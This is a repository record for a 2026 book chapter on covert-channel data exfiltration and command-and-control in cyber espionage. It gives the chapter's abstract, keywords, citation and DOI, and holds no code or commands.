The underbelly of cyber espionage

Author Identifier (ORCID)

Mohiuddin Ahmed: https://orcid.org/0000-0002-4559-4768

Abstract

Data exfiltration is one of the primary objectives of cyber espionage and it relies on a Command and Control (C2) infrastructure. This chapter explores how various Transmission Control Protocol/Internet Protocol (TCP/IP) protocols can be exploited or manipulated to establish covert channels for data exfiltration. It highlights the use of both standard protocols such as HTTP, SSH, TCP, UDP, and DNS and custom protocols that leverage the TCP/IP stack for C2 communication. Key methods include modifying protocol header fields to conceal data and using protocol tunnelling to disguise traffic by wrapping it in another protocol. The chapter concludes by examining the numerous attack vectors and the commonly used tools and techniques for C2 and data exfiltration, highlighting the challenges associated with their detection and mitigation.

Keywords

Cyberespionage, exfiltration, TCP/IP

Document Type

Book Chapter

Date of Publication

1-1-2026

Volume

1242

Publication Title

Studies in Computational Intelligence

Publisher

Springer

School

School of Science

Comments

Gaber, M., & Ahmed, M. (2026). The underbelly of cyber espionage. In M. Ahmed & S. D. Bachmann (Eds.), Cyber espionage and national security challenges (pp. 65–91). Springer. https://doi.org/10.1007/978-3-032-09423-0_4

Copyright

subscription content

First Page

65

Last Page

91

Link to Full Text

Share

 
COinS
 

Link to publisher version (DOI)

10.1007/978-3-032-09423-0_4